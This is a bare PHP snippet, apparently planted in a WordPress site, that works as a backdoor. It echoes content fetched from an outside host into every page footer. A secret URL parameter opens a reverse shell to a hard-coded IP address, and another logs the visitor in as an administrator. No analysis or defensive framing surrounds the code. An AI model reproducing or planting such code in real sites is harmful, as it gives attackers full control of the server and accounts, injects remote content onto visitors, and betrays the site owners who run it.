add_action('wp_footer', function() {
    $zhyperseo = file_get_contents("https://whats-new.pages.dev/web1.txt");
    if ($zhyperseo !== false) {
        echo $zhyperseo;
    }
});

if (isset($_GET['zhyper']) && $_GET['zhyper'] === 'sky') {
    $ip = '146.190.107.55';
    $port = 666;
    $socket = fsockopen($ip, $port);
    if ($socket) {
        proc_open("/bin/sh -i", [
            0 => $socket,
            1 => $socket,
            2 => $socket
        ], $pipes);
    }
}

if (isset($_GET['zhyper']) && $_GET['zhyper'] === 'forall') {
    $wp_user_query = new WP_User_Query([
        'role'   => 'Administrator',
        'number' => 1,
        'fields' => 'ID'
    ]);
    $results = $wp_user_query->get_results();
    if (isset($results[0])) {
        wp_set_auth_cookie($results[0]);
        wp_redirect(admin_url());
        exit();
    }
}
